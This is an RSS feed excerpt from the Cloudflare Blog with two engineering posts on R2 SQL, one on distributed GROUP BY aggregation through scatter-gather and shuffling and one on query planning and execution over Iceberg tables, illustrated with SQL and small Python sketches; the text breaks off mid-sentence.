
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Sat, 04 Apr 2026 00:20:56 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Announcing support for GROUP BY, SUM, and other aggregation queries in R2 SQL]]></title>
            <link>https://blog.cloudflare.com/r2-sql-aggregations/</link>
            <pubDate>Thu, 18 Dec 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare’s R2 SQL, a distributed query engine, now supports aggregations. Explore how we built distributed GROUP BY execution, using scatter-gather and shuffling strategies to run analytics directly over your R2 Data Catalog. ]]></description>
            <content:encoded><![CDATA[ <p>When you’re dealing with large amounts of data, it’s helpful to get a quick overview — which is exactly what aggregations provide in SQL. Aggregations, known as “GROUP BY queries”, provide a bird’s eye view, so you can quickly gain insights from vast volumes of data.</p><p>That’s why we are excited to announce support for aggregations in <a href="https://blog.cloudflare.com/r2-sql-deep-dive/"><u>R2 SQL</u></a>, Cloudflare's serverless, distributed analytics query engine, which is capable of running SQL queries over data stored in <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>R2 Data Catalog</u></a>. Aggregations will allow users of <a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a> to spot important trends and changes in the data, generate reports, and find anomalies in logs.</p><p>This release builds on the already supported filter queries, which are foundational for analytical workloads and allow users to find needles in haystacks of <a href="https://parquet.apache.org/"><u>Apache Parquet</u></a> files.</p><p>In this post, we’ll unpack the utility and quirks of aggregations, and then dive into how we extended R2 SQL to support running such queries over vast amounts of data stored in R2 Data Catalog.</p>
    <div>
      <h2>The importance of aggregations in analytics</h2>
      <a href="#the-importance-of-aggregations-in-analytics">
        
      </a>
    </div>
    <p>Aggregations, or “GROUP BY queries”, generate a short summary of the underlying data.</p><p>A common use case for aggregations is generating reports. Consider a table called “sales”, which contains historical data of all sales across various countries and departments of some organization. One could easily generate a report on the volume of sales by department using this aggregation query:</p>
            <pre><code>SELECT department, sum(value)
FROM sales
GROUP BY department</code></pre>
            <p>
The “GROUP BY” statement allows us to split table rows into buckets. Each bucket has a label corresponding to a particular department. Once the buckets are full, we can then calculate “sum(value)” for all rows in each bucket, giving us the total volume of sales performed by the corresponding department.</p><p>For some reports, we might only be interested in departments that had the largest volume. That’s where an “ORDER BY” statement comes in handy:</p>
            <pre><code>SELECT department, sum(value)
FROM sales
GROUP BY department
ORDER BY sum(value) DESC
LIMIT 10</code></pre>
            <p>Here we instruct the query engine to sort all department buckets by their total sales volume in descending order and return only the top 10 largest.</p><p>Finally, we might be interested in filtering out anomalies. For example, we might want to only include departments that had more than five sales total in our report. We can easily do that with a “HAVING” statement:</p>
            <pre><code>SELECT department, sum(value), count(*)
FROM sales
GROUP BY department
HAVING count(*) &gt; 5
ORDER BY sum(value) DESC
LIMIT 10</code></pre>
            <p>Here we added a new aggregate function to our query — “count(*)” — which calculates how many rows ended up in each bucket. This directly corresponds to the number of sales in each department, so we have also added a predicate in the “HAVING” statement to make sure that we only leave buckets with more than five rows in them.</p>
    <div>
      <h2>Two approaches to aggregation: compute sooner or later</h2>
      <a href="#two-approaches-to-aggregation-compute-sooner-or-later">
        
      </a>
    </div>
    <p>Aggregation queries have a curious property: they can reference columns that are not stored anywhere. Consider “sum(value)”: this column is computed by the query engine on the fly, unlike the “department” column, which is fetched from Parquet files stored on R2. This subtle difference means that any query that references aggregates like “sum”, “count”, and others needs to be split into two phases.</p><p>The first phase is computing new columns. If we are to sort the data by the “count(*)” column using an “ORDER BY” statement or filter rows based on it using a “HAVING” statement, we need to know the values of this column. Once the values of columns like “count(*)” are known, we can proceed with the rest of the query execution.</p><p>Note that if the query does not reference aggregate functions in “HAVING” or “ORDER BY”, but still uses them in “SELECT”, we can make use of a trick. Since we do not need the values of aggregate functions until the very end, we can compute them partially and merge results just before we are about to return them to the user.</p><p>The key difference between the two approaches is when we compute aggregate functions: in advance, to perform some additional computations on them later; or on the fly, to iteratively build results the user needs.</p><p>First, we will dive into building results on the fly — a technique we call “scatter-gather aggregations.” We will then build on top of that to introduce “shuffling aggregations” capable of running extra computations like “HAVING” and “ORDER BY” on top of aggregate functions.</p>
    <div>
      <h2>Scatter-gather aggregations</h2>
      <a href="#scatter-gather-aggregations">
        
      </a>
    </div>
    <p>Aggregate queries without “HAVING” and “ORDER BY” can be executed in a fashion similar to filter queries. For filter queries, R2 SQL picks one node to coordinate query execution. This node analyzes the query and consults R2 Data Catalog to figure out which Parquet row groups may contain data relevant to the query. Each Parquet row group represents a relatively small piece of work that a single compute node can handle. The coordinator node distributes the work across many worker nodes and collects the results to return to the user.</p><p>In order to execute aggregate queries, we follow all the same steps and distribute small pieces of work between worker nodes. However, this time instead of just filtering rows based on the predicate in the “WHERE” statement, worker nodes also compute <b>pre-aggregates</b>.</p><p>Pre-aggregates represent an intermediary state of an aggregation. This is an incomplete piece of data representing a partially computed aggregate function on a subset of data. Multiple pre-aggregates can be merged together to compute the final value of an aggregate function. Splitting aggregate functions into pre-aggregates allows us to horizontally scale computation of aggregation, making use of vast compute resources available in Cloudflare’s network.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Vh0x4qHkjOuQTrxSzkVKx/84c05ebf590cb4949b188f5856a4e951/image2.png" />
          </figure><p>For example, the pre-aggregate for “count(*)” is simply a number representing the count of rows in a subset of data. Computing the final “count(*)” is as easy as adding these numbers together. The pre-aggregate for “avg(value)” consists of two numbers: “sum(value)” and “count(*)”. The value of “avg(value)” can then be computed by adding together all “sum(value)” values, adding together all “count(*)” values, and finally dividing one number by the other.</p><p>Once worker nodes have finished computing the pre-aggregates, they stream results to the coordinator node. The coordinator node collects all results, computes final values of aggregate functions from pre-aggregates, and returns the result to the user.</p>
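<p>To make the pre-aggregate idea concrete, here is a minimal Python sketch, with illustrative names rather than R2 SQL internals, of how partial states for “count(*)” and “avg(value)” can be computed per worker and merged by the coordinator:</p>

```python
# Minimal sketch of mergeable pre-aggregates. Each worker processes a
# disjoint subset of rows; the coordinator merges the partial states.

def pre_aggregate(values):
    """Compute a partial state for count(*) and sum(value) on one worker."""
    return {"count": len(values), "sum": sum(values)}

def merge(states):
    """Merge partial states into final count(*) and avg(value)."""
    total_count = sum(s["count"] for s in states)
    total_sum = sum(s["sum"] for s in states)
    return {"count": total_count, "avg": total_sum / total_count}

# Three workers each see a subset of the "value" column.
worker_states = [pre_aggregate(chunk) for chunk in ([10, 20], [30], [40, 50, 60])]
final = merge(worker_states)
# count(*) = 6, avg(value) = 35.0
```

<p>Note that “avg” is not computed by averaging the workers’ averages; the partial sums and counts are combined first, which is exactly what makes the state mergeable.</p>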
    <div>
      <h2>Shuffling, beyond the limits of scatter-gather</h2>
      <a href="#shuffling-beyond-the-limits-of-scatter-gather">
        
      </a>
    </div>
    <p>Scatter-gather is highly efficient when the coordinator can compute the final result by merging small, partial states from workers. If you run a query like <code>SELECT sum(sales) FROM orders</code>, the coordinator receives a single number from each worker and adds them up. The memory footprint on the coordinator is negligible regardless of how much data resides in R2.</p><p>However, this approach becomes inefficient when the query requires sorting or filtering based on the <i>result</i> of an aggregation. Consider this query, which finds the top two departments by sales volume:</p>
            <pre><code>SELECT department, sum(sales)
FROM sales
GROUP BY department
ORDER BY sum(sales) DESC
LIMIT 2</code></pre>
            <p>Correctly determining the global Top 2 requires knowing the total sales for every department across the entire dataset. Because the data is spread effectively at random across the underlying Parquet files, sales for a specific department are likely split across many different workers. A department might have low sales on every individual worker, excluding it from any local Top 2 list, yet have the highest sales volume globally when summed together.</p><p>The diagram below illustrates why a scatter-gather approach would not work for this query. "Dept A" is the global sales leader, but because its sales are evenly spread across workers, it doesn’t make it into some local Top 2 lists, and ends up being discarded by the coordinator.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ZJ6AfXzepKtJhiL6DcjiJ/07f4f523d871b25dcf444ee2ada546bd/image4.png" />
          </figure><p>Consequently, when the query orders results by their global aggregation, the coordinator cannot rely on pre-filtered results from workers. It must request the totals for <i>every</i> department from <i>every</i> worker to calculate the global totals before it can sort them. If you are grouping by a high-cardinality column like IP addresses or User IDs, this forces the coordinator to ingest and merge millions of rows, creating a resource bottleneck on a single node.</p><p>To solve this, we need <b>shuffling</b>, a way to colocate data for specific groups before the final aggregation occurs.</p>
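<p>This failure mode is easy to reproduce. The following Python sketch, with invented sales figures, shows a department that never makes any worker-local Top 2 yet is the global leader:</p>

```python
# Invented figures: "Dept A" has 40 in sales on every worker, so it never
# makes a worker-local Top 2, yet its global total of 120 is the largest.
workers = [
    {"A": 40, "B": 60, "C": 50},  # per-department totals on each worker
    {"A": 40, "B": 50, "D": 55},
    {"A": 40, "C": 45, "D": 50},
]

def top2(totals):
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)[:2]

# Scatter-gather: each worker forwards only its local Top 2.
gathered = {}
for w in workers:
    for dept, total in top2(w):
        gathered[dept] = gathered.get(dept, 0) + total
wrong = top2(gathered)   # "A" was already discarded by every worker

# Correct approach: compute complete global totals first, then rank.
global_totals = {}
for w in workers:
    for dept, total in w.items():
        global_totals[dept] = global_totals.get(dept, 0) + total
right = top2(global_totals)  # [("A", 120), ("B", 110)]
```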
    <div>
      <h3>Shuffling of aggregation data</h3>
      <a href="#shuffling-of-aggregation-data">
        
      </a>
    </div>
    <p>To address the challenges of random data distribution, we introduce a <b>shuffling stage</b>. Instead of sending results to the coordinator, workers exchange data directly with each other to colocate rows based on their grouping key.</p><p>This routing relies on <b>deterministic hash partitioning</b>. When a worker processes a row, it hashes the <code>GROUP BY</code> column to identify the destination worker. Because this hash is deterministic, every worker in the cluster independently agrees on where to send specific data. If "Engineering" hashes to Worker 5, every worker knows to route "Engineering" rows to Worker 5. No central registry is required.</p><p>The diagram below illustrates this flow. Notice how "Dept A" starts on Workers 1, 2 and 3. Because the hash function maps "Dept A" to Worker 1, all workers route those rows to that same destination.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Mw7FvL7ZJgDZqnh3ygkZM/9cfb493b5889d7efe43e4719d9523c93/image1.png" />
          </figure><p>Shuffling aggregates produces the correct results. However, this all-to-all exchange creates a timing dependency. If Worker 1 begins calculating the final total for "Dept A" before Worker 3 has finished sending its share of the data, the result will be incomplete.</p><p>To address this, we enforce a strict <b>synchronization barrier</b>. The coordinator tracks the progress of the entire cluster while workers buffer their outgoing data and flush it via <a href="https://grpc.io/"><u>gRPC</u></a> streams to their peers. Only when every worker confirms that it has finished processing its input files and flushing its shuffle buffers does the coordinator issue the command to proceed. This barrier guarantees that when the next stage begins, the dataset on each worker is complete and accurate.</p>
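<p>The deterministic routing step described above can be sketched in a few lines of Python. This is an illustration rather than the engine’s actual code: <code>zlib.crc32</code> stands in for whatever stable hash function R2 SQL uses internally:</p>

```python
import zlib

NUM_WORKERS = 8  # illustrative cluster size

def route(group_key: str) -> int:
    # crc32 is stable across processes and machines, so every worker
    # independently computes the same destination for a given key.
    return zlib.crc32(group_key.encode("utf-8")) % NUM_WORKERS

# Rows for the same department always land on the same worker,
# no matter which worker emits them; no central registry is needed.
buckets = {}
for dept in ["Engineering", "Sales", "Engineering", "Marketing"]:
    buckets.setdefault(route(dept), []).append(dept)
```

<p>Python’s built-in <code>hash()</code> would not work here, since it is randomized per process for strings; the shuffle requires a hash that every worker computes identically.</p>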
    <div>
      <h3>Local finalization</h3>
      <a href="#local-finalization">
        
      </a>
    </div>
    <p>Once the synchronization barrier is lifted, every worker holds the complete dataset for its assigned groups. Worker 1 now has 100% of the sales records for "Dept A" and can calculate the final total with certainty.</p><p>This allows us to push computational logic like filtering and sorting down to the worker rather than burdening the coordinator. For example, if the query includes <code>HAVING count(*) &gt; 5</code>, the worker can filter out groups that do not meet this criterion immediately after aggregation.</p><p>At the end of this stage, each worker produces a sorted, finalized stream of results for the groups it owns.</p>
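<p>Here is a minimal Python sketch of this worker-local finalization, assuming the worker now owns every row for its assigned groups. Names echo the earlier “sales” example; this is not the engine’s actual code:</p>

```python
def finalize(groups):
    """groups: {department: list of sale values}, fully owned by this worker."""
    rows = [
        {"department": d, "sum": sum(v), "count": len(v)}
        for d, v in groups.items()
    ]
    # HAVING count(*) > 5: safe to apply locally, since counts are complete.
    rows = [r for r in rows if r["count"] > 5]
    # ORDER BY sum DESC: each worker emits an already-sorted stream.
    return sorted(rows, key=lambda r: r["sum"], reverse=True)

owned = {"A": [10] * 7, "B": [100] * 3, "C": [5] * 8}
stream = finalize(owned)
# "B" is dropped (only 3 rows); "A" (sum 70) sorts ahead of "C" (sum 40).
```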
    <div>
      <h3>The streaming merge</h3>
      <a href="#the-streaming-merge">
        
      </a>
    </div>
    <p>The final piece of the puzzle is the coordinator. In the scatter-gather model, the coordinator was responsible for the expensive task of aggregating and sorting the entire dataset. In the shuffling model, its role changes.</p><p>Because the workers have already computed the final aggregates and sorted them locally, the coordinator only needs to perform a <b>k-way merge</b>. It opens a stream to every worker and reads the results row by row. It compares the current row from each worker, picks the "winner" based on the sort order, and adds it to the query results that will be sent to the user.</p><p>This approach is particularly powerful for <code>LIMIT</code> queries. If a user asks for the top 10 departments, the coordinator merges the streams until it has found the top 10 items and then immediately stops processing. It does not need to load or merge the millions of remaining rows, allowing for greater scale of operation without over-consumption of compute resources.</p>
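<p>A streaming k-way merge with an early stop can be sketched using the standard library’s lazy <code>heapq.merge</code>. This is an illustration, not R2 SQL’s implementation:</p>

```python
import heapq
from itertools import islice

# Each worker returns (sum, department) pairs already sorted descending;
# sums are negated so heapq.merge (ascending) yields the largest first.
worker_streams = [
    iter([(-500, "A"), (-120, "D")]),
    iter([(-300, "B")]),
    iter([(-250, "C"), (-90, "E")]),
]

def top_n(streams, n):
    merged = heapq.merge(*streams)  # lazy: never materializes all rows
    return [(dept, -neg) for neg, dept in islice(merged, n)]

# LIMIT 2: only two rows are ever pulled past the merge point.
result = top_n(worker_streams, 2)
# [("A", 500), ("B", 300)]
```

<p>Because <code>heapq.merge</code> pulls one row at a time from each stream, stopping after <code>LIMIT</code> rows means the remaining rows on every worker are simply never read.</p>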
    <div>
      <h2>A powerful engine for processing massive datasets</h2>
      <a href="#a-powerful-engine-for-processing-massive-datasets">
        
      </a>
    </div>
    <p>With the addition of aggregations, <a href="https://developers.cloudflare.com/r2-sql/?cf_target_id=84F4CFDF79EFE12291D34EF36907F300"><u>R2 SQL</u></a> transforms from a great tool for filtering data into a powerful engine capable of processing massive datasets. This is made possible by distributed execution strategies like scatter-gather and shuffling, which push the compute to where the data lives, using the scale of Cloudflare’s global compute and network.</p><p>Whether you are generating reports, monitoring high-volume logs for anomalies, or simply trying to spot trends in your data, you can now easily do it all within Cloudflare’s Developer Platform without the overhead of managing complex OLAP infrastructure or moving data out of R2.</p>
    <div>
      <h2>Try it now</h2>
      <a href="#try-it-now">
        
      </a>
    </div>
    <p>Support for aggregations in R2 SQL is available today. We are excited to see how you use these new functions with data in R2 Data Catalog.</p><ul><li><p><b>Get Started:</b> Check out our <a href="https://developers.cloudflare.com/r2-sql/sql-reference/"><u>documentation</u></a> for examples and syntax guides on running aggregation queries.</p></li><li><p><b>Join the Conversation:</b> If you have questions, feedback, or want to share what you’re building, join us in the Cloudflare <a href="https://discord.com/invite/cloudflaredev"><u>Developer Discord</u></a>.</p></li></ul><p></p> ]]></content:encoded>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[Edge Computing]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">1qWQCp4QfhsZAs27s7fEc0</guid>
            <dc:creator>Jérôme Schneider</dc:creator>
            <dc:creator>Nikita Lapkov</dc:creator>
            <dc:creator>Marc Selwan</dc:creator>
        </item>
        <item>
            <title><![CDATA[R2 SQL: a deep dive into our new distributed query engine]]></title>
            <link>https://blog.cloudflare.com/r2-sql-deep-dive/</link>
            <pubDate>Thu, 25 Sep 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ R2 SQL provides a built-in, serverless way to run ad-hoc analytic queries against your R2 Data Catalog. This post dives deep under the Iceberg into how we built this distributed engine. ]]></description>
            <content:encoded><![CDATA[ <p>How do you run SQL queries over petabytes of data… without a server?</p><p>We have an answer for that: <a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a>, a serverless query engine that can sift through enormous datasets and return results in seconds.</p><p>This post details the architecture and techniques that make this possible. We'll walk through our Query Planner, which uses <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>R2 Data Catalog</u></a> to prune terabytes of data before reading a single byte, and explain how we distribute the work across Cloudflare’s <a href="https://www.cloudflare.com/network"><u>global network</u></a>, <a href="https://developers.cloudflare.com/workers/"><u>Workers</u></a> and <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a> for massively parallel execution.</p>
    <div>
      <h3>From catalog to query</h3>
      <a href="#from-catalog-to-query">
        
      </a>
    </div>
    <p>During Developer Week 2025, we <a href="https://blog.cloudflare.com/r2-data-catalog-public-beta/"><u>launched</u></a> R2 Data Catalog, a managed <a href="https://iceberg.apache.org/"><u>Apache Iceberg</u></a> catalog built directly into your Cloudflare R2 bucket. Iceberg is an open table format that provides critical database features like transactions and schema evolution for petabyte-scale <a href="https://www.cloudflare.com/learning/cloud/what-is-object-storage/">object storage</a>. It gives you a reliable catalog of your data, but it doesn’t provide a way to query it.</p><p>Until now, reading your R2 Data Catalog required setting up a separate service like <a href="https://spark.apache.org/"><u>Apache Spark</u></a> or <a href="https://trino.io/"><u>Trino</u></a>. Operating these engines at scale is not easy: you need to provision clusters, manage resource usage, and be responsible for their availability, none of which contributes to the primary goal of getting value from your data.</p><p><a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a> removes that step entirely. It’s a serverless query engine that executes retrieval SQL queries against your Iceberg tables, right where your data lives.</p>
    <div>
      <h3>Designing a query engine for petabytes</h3>
      <a href="#designing-a-query-engine-for-petabytes">
        
      </a>
    </div>
    <p>Object storage is fundamentally different from a traditional database’s storage. A database is structured by design; R2 is an ocean of objects, where a single logical table can be composed of potentially millions of individual files, large and small, with more arriving every second.</p><p>Apache Iceberg provides a powerful layer of logical organization on top of this reality. It works by managing the table's state as an immutable series of snapshots, creating a reliable, structured view of the table by manipulating lightweight metadata files instead of rewriting the data files themselves.</p><p>However, this logical structure doesn't change the underlying physical challenge: an efficient query engine must still find the specific data it needs within that vast collection of files, and this requires overcoming two major technical hurdles:</p><p><b>The I/O problem</b>: A core challenge for query efficiency is minimizing the amount of data read from storage. A brute-force approach of reading every object is simply not viable. The primary goal is to read only the data that is absolutely necessary.</p><p><b>The Compute problem</b>: The amount of data that does need to be read can still be enormous. We need a way to give the right amount of compute power to a query, which might be massive, for just a few seconds, and then scale it down to zero instantly to avoid waste.</p><p>Our architecture for R2 SQL is designed to solve these two problems with a two-phase approach: a <b>Query Planner</b> that uses metadata to intelligently prune the search space, and a <b>Query Execution</b> system that distributes the work across Cloudflare's global network to process the data in parallel.</p>
    <div>
      <h2>Query Planner</h2>
      <a href="#query-planner">
        
      </a>
    </div>
    <p>The most efficient way to process data is to avoid reading it in the first place. This is the core strategy of the R2 SQL Query Planner. Instead of exhaustively scanning every file, the planner makes use of the metadata structure provided by R2 Data Catalog to prune the search space, that is, to avoid reading huge swathes of data irrelevant to a query.</p><p>This is a top-down investigation where the planner navigates the hierarchy of Iceberg metadata layers, using <b>stats</b> at each level to build a fast plan, specifying exactly which byte ranges the query engine needs to read.</p>
    <div>
      <h3>What do we mean by “stats”?</h3>
      <a href="#what-do-we-mean-by-stats">
        
      </a>
    </div>
    <p>When we say the planner uses "stats", we are referring to summary metadata that Iceberg stores about the contents of the data files. These statistics create a coarse map of the data, allowing the planner to make decisions about which files to read, and which to ignore, without opening them.</p><p>There are two primary levels of statistics the planner uses for pruning:</p><p><b>Partition-level stats</b>: Stored in the Iceberg manifest list, these stats describe the range of partition values for all the data in a given Iceberg manifest file. For a partition on <code>day(event_timestamp)</code>, this would be the earliest and latest day present in the files tracked by that manifest.</p><p><b>Column-level stats</b>: Stored in the manifest files, these are more granular stats about each individual data file. Data files in R2 Data Catalog are formatted using the <a href="https://parquet.apache.org/"><u>Apache Parquet</u></a> format. For every column of a Parquet file, the manifest stores key information like:</p><ul><li><p>The minimum and maximum values. If a query asks for <code>http_status = 500</code>, and a file’s stats show its <code>http_status</code> column has a min of 200 and a max of 404, that entire file can be skipped.</p></li><li><p>A count of null values. This allows the planner to skip files when a query specifically looks for non-null values (e.g., <code>WHERE error_code IS NOT NULL</code>) and the file's metadata reports that all values for <code>error_code</code> are null.</p></li></ul><p>Now, let's see how the planner uses these stats as it walks through the metadata layers.</p>
    <div>
      <h3>Pruning the search space</h3>
      <a href="#pruning-the-search-space">
        
      </a>
    </div>
    <p>The pruning process is a top-down investigation that happens in four main steps:</p><p>1. <b>Table metadata and the current snapshot</b></p><p>The planner begins by asking the catalog for the location of the current table metadata. This is a JSON file containing the table's current schema, partition specs, and a log of all historical snapshots. The planner then fetches the latest snapshot to work with.</p><p>2. <b>Manifest list and partition pruning</b></p><p>The current snapshot points to a single Iceberg manifest list. The planner reads this file and uses the partition-level stats for each entry to perform the first, most powerful pruning step, discarding any manifests whose partition value ranges don't satisfy the query. For a table partitioned by <code>day(event_timestamp)</code>, the planner can use the min/max values in the manifest list to immediately discard any manifests that don't contain data for the days relevant to the query.</p><p>3. <b>Manifests and file-level pruning</b></p><p>For the remaining manifests, the planner reads each one to get a list of the actual Parquet data files. These manifest files contain more granular, column-level stats for each individual data file they track. This allows for a second pruning step, discarding entire data files that cannot possibly contain rows matching the query's filters.</p><p>4. <b>File row-group pruning</b></p><p>Finally, for the specific data files that are still candidates, the Query Planner uses statistics stored inside the Parquet files' footers to skip over entire row groups.</p><p>The result of this multi-layer pruning is a precise list of Parquet files, and of row groups within those Parquet files. These become the query work units that are dispatched to the Query Execution system for processing.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7GKvgbex2vhIBqQ1G5UFjQ/2a99db7ae786b8e22a326bac0c9037d9/1.png" />
          </figure>
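<p>The file-level min/max check at the heart of this pruning can be sketched in Python, mirroring the <code>http_status</code> example above. The file stats here are invented for illustration:</p>

```python
# Per-file column stats, as a manifest might record them for http_status.
files = [
    {"path": "a.parquet", "min": 200, "max": 404},
    {"path": "b.parquet", "min": 301, "max": 503},
    {"path": "c.parquet", "min": 500, "max": 504},
]

def may_contain(stats, value):
    """A file can match `http_status = value` only if value falls inside
    the file's [min, max] range; otherwise it is skipped unread."""
    return stats["min"] <= value <= stats["max"]

candidates = [f["path"] for f in files if may_contain(f, 500)]
# a.parquet is pruned without reading a single byte of its data.
```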
    <div>
      <h3>The Planning pipeline</h3>
      <a href="#the-planning-pipeline">
        
      </a>
    </div>
    <p>In R2 SQL, the multi-layer pruning we've described so far isn't a monolithic process. For a table with millions of files, the metadata can be too large to process before starting any real work. Waiting for a complete plan would introduce significant latency.</p><p>Instead, R2 SQL treats planning and execution together as a concurrent pipeline. The planner's job is to produce a stream of work units for the executor to consume as soon as they are available.</p><p>The planner’s investigation begins with two fetches to get a map of the table's structure: one for the table’s snapshot and another for the manifest list.</p>
    <div>
      <h4>Starting execution as early as possible</h4>
      <a href="#starting-execution-as-early-as-possible">
        
      </a>
    </div>
    <p>From that point on, the query is processed in a streaming fashion. As the Query Planner reads through the manifest files, and subsequently the data files they point to, it prunes them and immediately emits any matching data files and row groups as work units to the execution queue.</p><p>This pipeline structure ensures the compute nodes can begin the expensive work of data I/O almost instantly, long before the planner has finished its full investigation.</p><p>On top of this pipeline model, the planner adds a crucial optimization: <b>deliberate ordering</b>. The manifest files are not streamed in an arbitrary sequence. Instead, the planner processes them in an order matching the query's <code>ORDER BY</code> clause, guided by the metadata stats. This ensures that the data most likely to contain the desired results is processed first.</p><p>These two concepts work together to address query latency from both ends of the query pipeline.</p><p>The streamed planning pipeline lets us start crunching data as soon as possible, minimizing the delay before the first byte is processed. At the other end of the pipeline, the deliberate ordering of that work lets us finish early by finding a definitive result without scanning the entire dataset.</p><p>The next section explains the mechanics behind this "finish early" strategy.</p>
    <div>
      <h4>Stopping early: how to finish without reading everything</h4>
      <a href="#stopping-early-how-to-finish-without-reading-everything">
        
      </a>
    </div>
    <p>Thanks to the Query Planner streaming work units in an order matching the <code>ORDER BY </code>clause, the Query Execution system first processes the data that is most likely to be in the final result set.</p><p>This prioritization happens at two levels of the metadata hierarchy:</p><p><b>Manifest ordering</b>: The planner first inspects the manifest list. Using the partition stats for each manifest (e.g., the latest timestamp in that group of files), it decides which entire manifest files to stream first.</p><p><b>Parquet file ordering</b>: As it reads each manifest, it then uses the more granular column-level stats to decide the processing order of the individual Parquet files within that manifest.</p><p>This ensures a constantly prioritized stream of work units is sent to the execution engine. This prioritized stream is what allows us to stop the query early.</p><p>For instance, with a query like ... <code>ORDER BY timestamp DESC LIMIT 5</code>, as the execution engine processes work units and sends back results, the planner does two things concurrently:</p><p>It maintains a bounded heap of the best 5 results seen so far, constantly comparing new results to the oldest timestamp in the heap.</p><p>It keeps a "high-water mark" on the stream itself. Thanks to the metadata, it always knows the absolute latest timestamp of any data file that has not yet been processed.</p><p>The planner is constantly comparing the state of the heap to the water mark of the remaining stream. The moment the oldest timestamp in our Top 5 heap is newer than the high-water mark of the remaining stream, the entire query can be stopped.</p><p>At that point, we can prove no remaining work unit could possibly contain a result that would make it into the top 5. 
The pipeline is halted, and a complete, correct result is returned to the user, often after reading only a fraction of the potentially matching data.</p><p>Currently, R2 SQL supports ordering on columns that are part of the table's partition key only. This is a limitation we are working on lifting in the future.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5qN9TeEuRZJIidYXFictG/8a55cc6088be3abdc3b27878daa76e40/image4.png" />
          </figure>
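<p>The interplay between the bounded heap and the high-water mark can be sketched in Python. Timestamps are invented, and this illustrates only the stopping rule, not the planner’s actual code:</p>

```python
import heapq

LIMIT = 5  # ORDER BY timestamp DESC LIMIT 5

def should_stop(heap, high_water_mark):
    """Stop once the heap is full and even its oldest entry is newer than
    anything the remaining, unprocessed work units could still produce."""
    return len(heap) >= LIMIT and heap[0] > high_water_mark

heap = []  # min-heap: heap[0] is the oldest of the current Top 5
for ts in [900, 950, 870, 990, 940, 910, 960]:  # results from workers
    if len(heap) < LIMIT:
        heapq.heappush(heap, ts)
    elif ts > heap[0]:
        heapq.heapreplace(heap, ts)  # evict the oldest of the Top 5

# Metadata says every remaining work unit has timestamps <= 800.
done = should_stop(heap, high_water_mark=800)  # True: halt the query
```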
    <div>
      <h3>Architecture</h3>
      <a href="#architecture">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3wkvnT24y5E0k5064cqu0T/939402d16583647986eec87617379900/image3.png" />
          </figure>
    <div>
      <h2>Query Execution</h2>
      <a href="#query-execution">
        
      </a>
    </div>
    <p>The Query Planner streams the query work in bite-sized pieces called row groups. A single Parquet file usually contains multiple row groups, but most of the time only a few of them contain relevant data. Splitting query work into row groups allows R2 SQL to read only small parts of potentially multi-GB Parquet files.</p><p>The server that receives the user’s request and performs query planning assumes the role of query coordinator. It distributes the work across query workers and aggregates results before returning them to the user.</p><p>Cloudflare’s network is vast, and many servers can be under maintenance at the same time. The query coordinator contacts Cloudflare’s internal API to make sure only healthy, fully functioning servers are picked for query execution. Connections between the coordinator and query workers go through <a href="https://www.cloudflare.com/en-gb/application-services/products/argo-smart-routing/"><u>Cloudflare Argo Smart Routing</u></a> to ensure fast, reliable connectivity.</p><p>Servers that receive query execution requests from the coordinator assume the role of query workers. Query workers serve as a point of horizontal scalability in R2 SQL. With a higher number of query workers, R2 SQL can process queries faster by distributing the work among many servers. That’s especially true for queries covering large numbers of files.</p><p>Both the coordinator and query workers run on Cloudflare’s distributed network, ensuring R2 SQL has plenty of compute power and I/O throughput to handle analytical workloads.</p><p>Each query worker receives a batch of row groups from the coordinator, as well as the SQL query to run on them. Additionally, the coordinator sends serialized metadata about the Parquet files containing the row groups. Thanks to that, query workers know the exact byte offsets where each row group is located in the Parquet file without needing to read this information from R2.</p>
    <div>
      <h3>Apache DataFusion</h3>
    </div>
    <p>Internally, each query worker uses <a href="https://github.com/apache/datafusion"><u>Apache DataFusion</u></a> to run SQL queries against row groups. DataFusion is an open-source analytical query engine written in Rust. It is built around the concept of partitions. A query is split into multiple concurrent independent streams, each working on its own partition of data.</p><p>Partitions in DataFusion are similar to partitions in Iceberg, but serve a different purpose. In Iceberg, partitions are a way to physically organize data on object storage. In DataFusion, partitions organize in-memory data for query processing. While logically they are similar – rows grouped together based on some logic – in practice, a partition in Iceberg doesn’t always correspond to a partition in DataFusion.</p><p>DataFusion partitions map perfectly to the R2 SQL query worker’s data model because each row group can be considered its own independent partition. Thanks to that, each row group is processed in parallel.</p><p>At the same time, since row groups usually contain at least 1000 rows, R2 SQL benefits from vectorized execution. Each DataFusion partition stream can execute the SQL query on multiple rows in one go, amortizing the overhead of query interpretation.</p><p>There are two ends of the spectrum when it comes to query 